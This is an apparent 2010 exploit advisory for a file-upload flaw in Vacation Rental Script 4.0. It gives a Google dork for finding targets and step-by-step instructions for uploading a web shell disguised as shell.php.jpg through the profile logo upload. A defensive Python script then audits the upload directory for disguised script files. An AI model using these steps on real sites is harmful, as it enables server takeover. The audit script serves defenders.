Vacation Rental Script v4.0 Arbitrary File Upload Vulnerability

2010-12-20 17:15:07

Script Name: Vacation Rental Script <= 4.0
Site: http://www.vacationrentalscript.com/

Bug: Upload Shell
Found: Br0ly
google dork: "2006 - 2009 Vacation Rental Script" BraZIL!!

You need to register an account first:

Signup: http://server/signup

Check your email for the login and password.

Then log in:

http://server/members/login

After logging in, go to:

http://server/members/profile

At the bottom of the page you can upload a logo. Why not a little and nice
shell?

Upload a shell named like shell.php.jpg or shell.php.jpeg

After the upload, the file is reachable at:

http://server/public/upload/logos/youshell.php.jpg
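
For operators of an affected install, the logo directory above can be audited for files that are not plain images. This Python script is an added example, not part of the original advisory; the extension list, the image signatures and the `<?php` marker check are assumptions, and the sample files are constructed.

```python
import tempfile
from pathlib import Path

# Extensions a PHP-enabled web server may hand to an interpreter (assumed list).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
# Leading bytes of the image types a logo upload should accept.
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")


def audit_file(path):
    """Return the reasons why one uploaded logo looks suspicious."""
    reasons = []
    # Check every dot-separated segment: "shell.php.jpg" ends in .jpg but carries .php.
    segments = path.name.lower().split(".")[1:]
    if any(seg in SCRIPT_EXTS for seg in segments):
        reasons.append("script extension in name")
    data = path.read_bytes()
    if not data.startswith(IMAGE_MAGIC):
        reasons.append("content is not JPEG/PNG/GIF")
    if b"<?php" in data.lower():
        reasons.append("embedded PHP open tag")
    return reasons


def audit_dir(root):
    """Walk the upload directory; map each flagged relative path to its reasons."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        reasons = audit_file(path) if path.is_file() else []
        if reasons:
            findings[str(path.relative_to(root))] = reasons
    return findings


def demo():
    """Build a constructed logos directory and audit it."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "logo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,        # ordinary JPEG header
            "shell.php.jpg": b"<?php /* placeholder */ ?>",         # name from the advisory
            "shell.php.jpeg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,  # image bytes, script name
        }
        for name, body in samples.items():
            Path(root, name).write_bytes(body)
        return audit_dir(root)


if __name__ == "__main__":
    print(demo())
```

Point `audit_dir` at the real `public/upload/logos` directory of the install; any hit warrants checking the web server access log for requests to that file.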

Fixes

No fixes
